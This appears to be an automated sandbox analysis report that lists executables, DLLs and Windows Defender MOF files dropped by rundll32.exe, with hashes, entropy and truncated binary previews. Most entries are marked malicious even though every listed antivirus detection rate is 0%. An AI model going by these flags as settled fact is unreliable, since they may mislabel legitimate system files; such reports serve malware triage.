                                                                            SSDEEP:3072:SbKF9Ch4oIM5qO2j+1L4BitdPhPIBcV0YnoC4PlS/KB8cV2j6jaV4:S+nCZIM1Ld7hgjWoXYcV7z
                                                                            MD5:F05E8D6365BF5A5218071548F5E687A0
                                                                            SHA1:B132FE303519E4BE50A547D6A6FE8AF359C8D335
                                                                            SHA-256:657A136378B351C50C2D60D425210021C8FE0BB9E8B998320163CC09339899AC
                                                                            SHA-512:B09B0FE1693F2B726B56CE745EF949CDE3A0D2412D763F3F84FEBAD3C4D28A0FDB6ED40CA55EFB0D8AEB5EF410402F42229F06583EC9B1572D477029141B7FFF
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..............~....o....s....x..v.z.p.....L....V.....~.....6......~.....~..Rich...........................PE..d......0.........." .........................................................p......&.....`A.........................................................P.......0.......`...%...`......@...p.......................(...`...8............................................text...Bw.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103672
                                                                            Entropy (8bit):5.463582216147117
                                                                            Encrypted:false
                                                                            SSDEEP:1536:9QyB1n0kg+iFMx3/TOw987XxhLTdCfDQl/0agrW7mPfp5PRnNazo:pn0k8FM5/TOw27XTdCfDW8nNPfp5pNa8
                                                                            MD5:5B57B2C8291FE382F8F87E91A19B5BB9
                                                                            SHA1:0B4224F7DA53BF49A1A822DA111464B185657A8A
                                                                            SHA-256:48732B6B8C62DAEA68F2C38EEDEEA59DA2F142403AF9EE0D8D77181BDD22BBD1
                                                                            SHA-512:4E2012B7C19319A97F4AAA7C94DD7427C850B30EAD8E679F8140AF60724AEACDFA943BA9501D456F66DB08E2325772B90F2F8E5502AB63909F5F4BED97FEC8BF
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.f.>...>...>.....?......4......2......9...7...1...>...0............?...........?.....?...Rich>...........PE..d...R.L..........." .................^....................................................`A........................................0...H...x........`..`....P.......p...$...p..........p...................h...(...0...8...............0............................text............................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...`....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):373224
                                                                            Entropy (8bit):5.820010710818714
                                                                            Encrypted:false
                                                                            SSDEEP:6144:zbkK5UHrNrsedr+z0nsqBmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60R:eNgGr+Wjl
                                                                            MD5:9CA81B59C17591C8B09AF4D753A28020
                                                                            SHA1:95D7494686DFA1701FEF297944EBA28B06380931
                                                                            SHA-256:98EFF3DF7B16B9743B4F5A89F163406946E8C42229DEFCEB77E26BB5B2FF307A
                                                                            SHA-512:C782A8C01B12CBCDB77D49224D04D386E0EC68F66789C9970370CC68BDD0270ADAE8D3DE52AFF821189BC1BA96231FA283489854E3AF7D67ADEB4BDE3FA52D8D
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..cP...%..cP...%..?W...%..?W...%...]...%..?W...%..?Wn..%..?W...%...%...$..cP...%..cPl..%..cP...%..Rich.%..........................PE..d....3|s.........."..................9.........@.....................................}............... ......................................4...@....p.......P..H........1......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..H....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):144728
                                                                            Entropy (8bit):3.894814306787259
                                                                            Encrypted:false
                                                                            SSDEEP:768:w81RWuK37OeBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXRrL1PemM9t:wssBkG2usKfPeFz
                                                                            MD5:E49B09EAC7BD3C5B71B0F33E72A2CF34
                                                                            SHA1:61F5B81BF0C81090098806B2EF3C8EF895504AD9
                                                                            SHA-256:E9C233A28F49690339710143FDC146FAA9B73E89A8D828CC026F7246C5CED71E
                                                                            SHA-512:2E75983DD7FE9FFB73A5CCE89A6A0C19489A4ADBAC0D6B68AB53B08CF12D3D9BE7FC139E8C7B9CCD37FF07B5B24E7D9CAEDAFACFCBE3CC3351C504AA8AE564A3
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......................................................................`.......................................................... ..................X%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):496912
                                                                            Entropy (8bit):6.014056505362478
                                                                            Encrypted:false
                                                                            SSDEEP:6144:UTmg/KSnLsE0aGPrR4IcdwSbttHRqJULrf6KmiTVVmVVV8VVNVVVcVVVxVVVPVVQ:UxSrR4Ic7bttxqJULrTj
                                                                            MD5:82D45EE8BCA40389EA79879C75EC6207
                                                                            SHA1:86108949630649367EA91153EEE86F2FDC9F2489
                                                                            SHA-256:CE0B09D43134DD41BA555AAF18DD491EC610DD503864CAF7BFFF60AFB73F8ED5
                                                                            SHA-512:8E03CC2B53635BBA4D3AB21946C20D91B8387BE0FDEF700A893104AD5153CAF2632A1D51766DEBCA6A05C35F15B40F08A20EE52FD154938D930406C0A8F354EE
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EA.G. ... ... ...U... ...R... ... ..-!...R... ...R... ...R... ...U... ...U..M ...U/.. ...U... ..Rich. ..................PE..d..............." ..........................._....................................|.....`A................................................D...x............`...#...p...%......t.......p....................8..(...P7..8............8..p............................text...2........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):202072
                                                                            Entropy (8bit):5.957890458465426
                                                                            Encrypted:false
                                                                            SSDEEP:3072:H/5F5VF0f8aKwRRw9XOfCAbP+A+TQ3KTeWxFYapr7Du2pe:H/5Fp0fThRRw9+fCAldmFYMpe
                                                                            MD5:4987F9EFD8B2E414801BB322400D2BFD
                                                                            SHA1:A1AAA1743D7927D667EDC74A36B1A8EFF5FE2470
                                                                            SHA-256:08789F41E50D75EADBDF097494D9AD66B26FED684501E99B5E219CA7FDE0489D
                                                                            SHA-512:FFDCEE1706AE0E02D8E79D3775EEF40E86B331CE186EEB0BB897ACF70AB85260C2AED15DBAA3AD93161A159202D1004A149A30573D5CC83AE249A3DEE17C4CBF
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.:...i...i...i.r.h...i.r.h...i...i#..i.r.h...i.r.h...i.r.h...i.r.h...i.rAi...i.r.h...iRich...i........................PE..d...-.T..........." ......... ......@.....................................................`A.........................................u......Hv..,.......@...............X%......p....+..p.......................(.......@...........(................................text...l........................... ..`.rdata..&...........................@..@.data... ...........................@....pdata........... ..................@..@.rsrc...@...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1619192
                                                                            Entropy (8bit):6.3400930707756755
                                                                            Encrypted:false
                                                                            SSDEEP:24576:uLLxAt3sZG5yM+SrnrwrTqfb8BPVEGAUFSCJMb1ierG:ko8ZGk8nEqfoBPqdUFrMb1ieq
                                                                            MD5:59CD6F03A00980D8ADBF42EFBB9FFFD8
                                                                            SHA1:F5471A156DDDC69799782E3FE0D72FD6E8D0F085
                                                                            SHA-256:A6D588A8EC27E9294C52BA9ABE5DD1FC7C99E129B7CAF9C19F39FF6ECA236B0A
                                                                            SHA-512:49D69D9C19342985B0E520868F7745A4B515EF2EC5778372E266978A9FE690BC3BEF37CB0CA2B513D829B82D92A4D04C8143B594ABF83A3082B86324EE6B0A8E
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P(c..I...I...I..<...I..<...I...;...I...I...H...;...I...;..=I...;...I...;...I..<...I..<...I..<...I..<...I..Rich.I..................PE..d....(~..........." .................3.........^..........................................`A........................................@............... ..hg...`..,........$..............p...................P|..(....G..8...........x|..........@....................text............................... ..`.rdata..>.... ....... ..............@..@.data....v.......`..................@....pdata..,....`.......@..............@..@.didat..x...........................@....rsrc...hg... ...p..................@..@.reloc........... ...p..............@..B................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3282192
                                                                            Entropy (8bit):6.315630312982859
                                                                            Encrypted:false
                                                                            SSDEEP:98304:rGo+pTlHiqauRMwGM2CEwCaCEaC3CE8CYPpCGnCqCEPCBCEPCjY:rGo+pTlHiqP/G7Y
                                                                            MD5:3767B51F5D134FD6A459F2F30C87ED14
                                                                            SHA1:33DEC014E1CB9A3B6BF4F3D037935C3E7E39904A
                                                                            SHA-256:203E41C2321D802387381D4F003EA49884A0CA0BF61ADF7D103992B0D529932C
                                                                            SHA-512:7E5AE6E6BC9E5E9A70E5A1C3B37707EDB6CE62266B59AD452E2A2F27008BA0F51661E46095130DBD04CA62C7E10F087B51F6D41FDA04CB19D0A806FE2D4A581B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......U.....zE..zE..zE..{D..zE..yD..zE..{D..zE..~D..zE..yD..zE...E..zE..{EL.zE...D!.zE..E..zE..zD..zE..sDe.zE6y.E..zE..E..zE..xD..zERich..zE........................PE..d.....;..........." ......$....................\.............................02.......2...`A...........................................d...T...|....`1.......0.<D....1..%....1.\6...r*.p.....................%.(.....$.8...........@.%..............................text...nu$.......$................. ..`.rdata...X....$..`....$.............@..@.data...............................@....pdata..<D....0..P..../.............@..@.didat.......P1.......1.............@....rsrc........`1...... 1.............@..@.reloc..\6....1..@....1.............@..B........................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):107880
                                                                            Entropy (8bit):5.399183517403788
                                                                            Encrypted:false
                                                                            SSDEEP:3072:/+V443d04OzmE9ww+vKTebKJy5zeWKGo3:/+V443d05n9rwKw5zNQ
                                                                            MD5:5020E4A4321476F7DE557F75CBC87438
                                                                            SHA1:6F135DE3D7A2FF90AF6401E5C01FCC282B0A4108
                                                                            SHA-256:41E3B40B6B8472380568BCF75FB493515DBAF63BF948F9DA9267F459D422F78F
                                                                            SHA-512:7AA722B45373F82F5ED8F6559D149E3DD72A00CB942D39BA2B0F584FF6FABFB62B1A0A52195298389CB2C698DA4E62F2D78DDE2DF46FF1183BA0F2118A2297C5
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ql>}..P...P...P..u....P.^uS/..P.^uT/..P...Q...P.^uQ/..P.^uU/..P.^uP/..P.^uX/:.P.^u....P.^uR/..P.Rich..P.........................PE..d................." ...........................e....................................3.....`A................................................4........P.......@..d.......h%...p......0...p.......................(.......@............................................text............................... ..`.rdata...e.......p..................@..@.data...@.... ... ... ..............@....pdata..d....@.......@..............@..@.rsrc........P... ...P..............@..@.reloc.......p.......p..............@..B................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):128376
                                                                            Entropy (8bit):5.778415627793409
                                                                            Encrypted:false
                                                                            SSDEEP:3072:svVXrm01KTBVOm81W0z3J8EfKTee1YzFw/x65B:svBjiBVOmGJJ0kFaw3
                                                                            MD5:2C2714BAB4E11FD6865DDF8B501A212D
                                                                            SHA1:9B5D52CB7A6CF62B83A36566DEAD2C28B0D1A96E
                                                                            SHA-256:0C60E5D6BB49E1F85DEA4305BCB2308708A11A8A2C228D0C1F3F41BE79AF09C2
                                                                            SHA-512:73ECA7073D9ECB8015C23E494D948C1D50A32CF96D2E0190D08FD48A69F725DCE35D2A6506FAF037FB42405A55DBF22A7776068BD30811721AC086C04A65001C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]P...P...P......Q.......].......W...Y.B.@...............]...P...d.............Q......Q...RichP...................PE..d...../..........."............................@............................................................................................tj.......... ...............x%......`....<..p....................$..(...."..8...........@$...............................text...R........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata........... ..................@..@.rsrc... ...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):21776
                                                                            Entropy (8bit):4.731417909543677
                                                                            Encrypted:false
                                                                            SSDEEP:192:7rFQWgZHWAALc2Fu462TNbvRpSDBQABJw5Wayks9gICQX01k9z3AbwmN:7rFQWgZHWA1MJ16DBRJwLy/P/R9zlmN
                                                                            MD5:0613DECA278E353EBC96493895754CCE
                                                                            SHA1:D72682AE6E077DE106235D9C236B2C7F744E2DBC
                                                                            SHA-256:D84E4315C6121FA8F8D4D477FF8C70AC899EC29CF7EE10CCD1BE1A01E7E57D9E
                                                                            SHA-512:275A7A398EA6DA4284489C437D8EB0FFA3C7FEAA299235AF92CF3E8AFB78E5487337F4B5C7544C9CFBC2AAE90BAEFDF02417C6E9125BE8BA98902464AD766CD9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d...a.n..........." ......... ...............................................0...........`A......................................................... ...............0...%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):21856
                                                                            Entropy (8bit):4.482734780628967
                                                                            Encrypted:false
                                                                            SSDEEP:192:nrWNzOWPicCroDBQABJ54pZMMBdRgjLX01k9z3AzslM1Y3qq:rWNzOWPbDBRJGTleLR9zusloYZ
                                                                            MD5:9EEE260CF0F752D4595E51AF7EBD8B6A
                                                                            SHA1:1544C414D1240AC4F8FED45551EA061CD4665721
                                                                            SHA-256:49FA47F6F2444DC2235813961ED8395D04F86B9DF3EA08882BFFED4EAD3502F4
                                                                            SHA-512:27EDB26E104294A9DB70A4B58930220694E877DF808D4838DBDC2516BAEB5BF996C759446BE18855F52D424CDB3B5BFDD26B64B087AF167ABD661FC7C5CAEE17
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......... ...............................................0......7.....`.......................................................... .. ............0..`%..............T............................................................................rdata..............................@..@.rsrc... .... ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2909208
                                                                            Entropy (8bit):6.442167136448819
                                                                            Encrypted:false
                                                                            SSDEEP:49152:LJlKh3CsTiIy0vAayl+xFJCPg3gUZ/RG6XICg:DIPlIn
                                                                            MD5:852AAE2F9F2F13FD6AECC1E1817D8BF1
                                                                            SHA1:548C65353A1A7ACFA4CCF72F94571FEEB533AB44
                                                                            SHA-256:6BFE5B785D96525C9F060474837A83434E9EEAB498A07396C5EDB7EA925BF8B9
                                                                            SHA-512:3A7F1D8FD4D0D779383697632E3B00B803E510719AA80130337EFA7C6AB94418C3DD1315B866D4E9B2F4028777DE1229B1BD8057129C89D2778DEF1F465F95D2
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C|......C|.......{.......{.......{.......q;..............{.......{U.............C|..i...C|W.....C|......Rich............................PE..d....v............".......#..........."........@..............................-.......-...`..................................................X).,.....,.H....@+.dU....+.......,..1..0.%.p....................$.(.....$.8.............$.@....N)......................text.....#.......#................. ..`.rdata...{....$.......$.............@..@.data...p.....).......).............@....pdata..dU...@+..`... *.............@..@.didat........,.......+.............@....rsrc...H.....,.......+.............@..@.reloc...1....,..@....+.............@..B................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):738576
                                                                            Entropy (8bit):6.022878886310737
                                                                            Encrypted:false
                                                                            SSDEEP:12288:iQo3VmVdaveWcQRUtwywRXT349/gehVTef1YecoFW3h07EVd:U4VdamQRamXGef63ou0EVd
                                                                            MD5:CFC96445CC630E00935A8A74875BD45C
                                                                            SHA1:5572055932156EA9F569ACB1CFC0E714373765D6
                                                                            SHA-256:D132DE7BFAFDA6F0A9CFA4A829892FBA6C531D721C4A1BA9918BD5553BA0336B
                                                                            SHA-512:92E737A59BE464ADB5152C4406E76578CC70FECE2E58EAA845A654A1A70BBDBF7EB57B3079179C8666944111FEEB59E3D54F0CDC61B7F5639BEC62D31B851B46
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)m.m...m...m....y..l....y..o...~..|...m.......~..w...~..c...~......y..l....y.......yG.l....y..l...Richm...................PE..d......+.........." .....p..................................................@............`A............................................................X....p..(P... ...%......,H..<...p.......................(.......8...................D........................text....d.......p.................. ..`.rdata...S.......`..................@..@.data...D........p..................@....pdata..(P...p...`...P..............@..@.didat..............................@....rsrc...X...........................@..@.reloc..,H.......P..................@..B........................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (4929), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):94958
                                                                            Entropy (8bit):3.592146871128743
                                                                            Encrypted:false
                                                                            SSDEEP:768:hvQJc7QeBhFbUAbYzlyZCvQJc7QeBhFbUAbYzlyZg:uMbgyLMbgya
                                                                            MD5:4B23206905E11134BEB571548C245F3C
                                                                            SHA1:3E0AE50991CD2422E1C2FDCC9C6F6DF8EAB18FEC
                                                                            SHA-256:2CF7F8EF415A75427E90C50BC18BF5FBE25398A3E805A08F0DA5DEEB48C7CCA1
                                                                            SHA-512:9A758F7C1BC185EDE944CDC6A12B2664F5A1EBC31623FE40C469E317199D5A93E8CCB786042C4012D3ED3D57E271C853D60019D516BA399430ACEBD4BE938E5D
                                                                            Malicious:false
                                                                            Preview:..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2664
                                                                            Entropy (8bit):3.464075447819169
                                                                            Encrypted:false
                                                                            SSDEEP:24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
                                                                            MD5:C4E26C53F76774E091FEE17FFFF64414
                                                                            SHA1:5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
                                                                            SHA-256:5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
                                                                            SHA-512:635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
                                                                            Malicious:false
                                                                            Preview:..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.R.o.l.l.b.a.c.k.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):165208
                                                                            Entropy (8bit):7.110142692986595
                                                                            Encrypted:false
                                                                            SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                                                            MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                                                            SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                                                            SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                                                            SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......W.........." .........P...............................................`............`.......................................................... ...<...........`..X%..............T............................................................................rdata..............................@..@.rsrc....<... ...@... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):403816
                                                                            Entropy (8bit):6.1451106536127735
                                                                            Encrypted:false
                                                                            SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                                                            MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                                                            SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                                                            SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                                                            SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.u.3..,3..,3..,'..-1..,V..-2..,V..-2..,'..-9..,'..-!..,:.,!..,'..-...,V..-&..,3..,...,'..-]..,'..,2..,'..-2..,Rich3..,........................PE..L.....,......................L.......H............@..........................@.......Q........... ..............................|....0..................h/......,F.....T...........................H...........................`....................text............................... ..`.data....).......$..................@....idata... ......."..................@..@.didat..(.... ......................@....rsrc........0......................@..@.reloc..,F.......H..................@..B................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):25936
                                                                            Entropy (8bit):4.328275985676387
                                                                            Encrypted:false
                                                                            SSDEEP:192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
                                                                            MD5:4A8B58C88DF1C607A9DF21EE390CA8F8
                                                                            SHA1:18B995CA90D74D34975F9DF8E8611F35E7B94E9D
                                                                            SHA-256:1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
                                                                            SHA-512:1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
